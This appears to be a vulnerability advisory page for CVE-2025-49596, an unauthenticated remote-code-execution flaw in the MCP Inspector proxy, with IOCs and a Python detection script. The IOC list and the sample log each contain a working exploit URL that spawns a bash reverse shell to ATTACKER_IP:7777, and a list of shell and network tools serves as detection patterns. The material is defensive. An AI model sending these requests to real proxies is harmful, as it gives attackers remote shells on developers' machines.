CVE-2025-49596
published 2025-06-13


Priority P188 · critical · 9.4 (CVSS 4.0)
Exploited in the wild (ITW exploit · VulnCheck KEV · initial access)
EPSS: 37.03% (98.3rd percentile)
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.

Affected (3 ranges)

Vendor                 Product     Version range       Fixed in
mcpjam                 inspector   >= 0, < 1.4.3       1.4.3
modelcontextprotocol   inspector   < 0.14.1            0.14.1
modelcontextprotocol   inspector   >= 0, < 0.14.1      0.14.1

Detection & IOCs (extracted from sources)

  • port: 6277
  • port: 6274
  • url: http://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=
  • url: hxxp://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser
  • path: /sse
  • other: mcp-session-id
  • port: 7777
  • Monitor for HTTP GET requests to the /sse endpoint on port 6277 (bound to 0.0.0.0 in vulnerable versions) whose query string contains transportType=stdio and a command= parameter; this is the canonical exploit path for CVE-2025-49596.
  • In patched versions (0.14.1+), the proxy answers such a request with HTTP 401 and the body 'Authentication required. Use the session token shown in the console when starting the server'. A proxy on port 6277 that accepts the request instead of returning this response is a vulnerable instance.
  • Alert on process spawning from the MCP proxy process (node/npx) where the child processes include shells (bash, sh) or network utilities (nc, curl); the proxy spawns a new process for whatever command the client sends.
  • Use Shodan or internal asset discovery to identify exposed MCP Inspector proxy instances listening on port 6277; at time of writing 560 instances were publicly exposed.
  • DNS rebinding detection: watch for a domain with a very short TTL that first resolves to a public IP and then to 127.0.0.1 or 0.0.0.0. Once the attacker's hostname points at the victim's loopback address, the attacker's page can reach the unauthenticated Inspector proxy API with requests the browser treats as same-origin, sidestepping the same-origin policy.
  • The MCP proxy binds to all network interfaces by default (not just localhost) in vulnerable versions, so it is reachable by any attacker on the same network or the internet, not only through browser-based CSRF against localhost.
  • CVE-2025-49596 affects all software that embeds or depends on MCP Inspector versions prior to 0.14.1, not just standalone installations.
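The detections in the list above, as an added Python example that is not part of this page or of the MCP Inspector project: it parses access-log lines for the /sse?transportType=stdio&command= exploit shape (percent-decoding args so the spawned command line is readable), interprets the reply to an unauthenticated probe as patched or vulnerable using the 401 body quoted above, and flags the public-to-loopback DNS flip of a rebinding attack. The '<client> <method> <url> <status>' log format, the (timestamp, name, answer) DNS tuples and every sample address are constructed for illustration.

```python
"""Detection helpers for CVE-2025-49596 (MCP Inspector unauthenticated proxy RCE).

Added example; not code from the cvebase page or the MCP Inspector project.
All log lines and DNS records below are constructed for illustration.
"""
import ipaddress
from typing import Optional
from urllib.parse import parse_qs, urlsplit

INSPECTOR_PROXY_PORT = 6277          # proxy port listed in the advisory IOCs
PATCHED_BODY = ("Authentication required. Use the session token shown in the "
                "console when starting the server")
# Spawned commands that almost never appear in legitimate Inspector use.
SUSPICIOUS_COMMANDS = {"bash", "sh", "zsh", "dash", "nc", "ncat", "curl", "wget"}


def analyse_request(url: str) -> Optional[dict]:
    """Return a finding if `url` is a stdio-spawn request to the proxy's /sse endpoint.

    Exploit shape: GET /sse?transportType=stdio&command=<bin>&args=<argv>&env=...
    The vulnerable proxy spawns <bin> <argv> without any authentication.
    """
    url = url.replace("hxxp://", "http://", 1)           # re-fang defanged IOCs
    parts = urlsplit(url)
    if parts.path != "/sse":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    if qs.get("transportType", [""])[0] != "stdio" or "command" not in qs:
        return None
    command = qs["command"][0]
    binary = command.rsplit("/", 1)[-1]
    return {
        "host": parts.hostname,
        "port": parts.port,
        "command": command,
        "args": qs.get("args", [""])[0],
        "high_confidence": binary in SUSPICIOUS_COMMANDS,
    }


def scan_access_log(lines):
    """Apply analyse_request to '<client> <method> <url> <status>' lines (constructed format)."""
    findings = []
    for line in lines:
        client, method, url, status = line.split()
        hit = analyse_request(url)
        if hit and method == "GET":
            hit.update(client=client, status=int(status))
            findings.append(hit)
    return findings


def classify_probe(status: int, body: str, content_type: str = "") -> str:
    """Interpret the reply to an unauthenticated GET /sse?transportType=stdio probe.

    0.14.1+ answers 401 with the 'Authentication required ...' body. A proxy that
    opens the SSE stream (200, text/event-stream) accepted the command: vulnerable.
    Anything else is inconclusive (possibly not an Inspector proxy at all).
    """
    if status == 401 and body.startswith("Authentication required"):
        return "patched"
    if status == 200 and content_type.startswith("text/event-stream"):
        return "vulnerable"
    return "unknown"


def detect_rebinding(dns_events, window_s: int = 60):
    """Flag names that resolve to an external address and then, within `window_s`
    seconds, to a loopback or unspecified address (127.0.0.1, 0.0.0.0, ::1).

    That flip is the DNS-rebinding pattern that turns an attacker page's
    same-origin requests into requests against the local Inspector proxy.
    `dns_events` is an iterable of (unix_ts, qname, answer_ip).
    """
    last_external = {}
    flagged = []
    for ts, name, answer in sorted(dns_events):
        ip = ipaddress.ip_address(answer)
        if ip.is_loopback or ip.is_unspecified:
            if name in last_external and ts - last_external[name] <= window_s:
                flagged.append(name)
        else:
            last_external[name] = ts
    return flagged


# --- constructed sample data ---------------------------------------------------
SAMPLE_LOG = [
    "10.0.0.5 GET http://127.0.0.1:6274/ 200",                                  # UI, benign
    "10.0.0.5 GET http://127.0.0.1:6277/sse?transportType=sse&url=http%3A%2F%2Flocalhost%3A3001%2Fsse 200",
    "203.0.113.7 GET http://0.0.0.0:6277/sse?transportType=stdio&command=touch"
    "&args=%2Ftmp%2Fexploited-from-the-browser 200",
    "203.0.113.7 GET http://127.0.0.1:6277/sse?transportType=stdio&command=bash"
    "&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP"
    "%2F7777%200%3E%261%27%22&env= 200",
]
SAMPLE_DNS = [
    (1000, "attacker.example", "203.0.113.7"),   # page load from the attacker host
    (1005, "attacker.example", "127.0.0.1"),     # rebinds to loopback 5 s later
    (1000, "cdn.example", "203.0.113.9"),
    (5000, "cdn.example", "203.0.113.9"),        # stable answer, never flagged
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(classify_probe(401, PATCHED_BODY), detect_rebinding(SAMPLE_DNS))
```

The request check keys on the path and the two query parameters rather than on the port, because the same proxy can be exposed behind a reverse proxy on another port; the port and client address are carried along in the finding so the analyst can tell a localhost-only CSRF hit from a request that arrived over the network.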

CVSS provenance

  • NVD (CVSS 4.0): 9.4 CRITICAL
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • GHSA: 9.4 CRITICAL
  • OSV: 9.4 CRITICAL
  • VulnCheck: 9.4 CRITICAL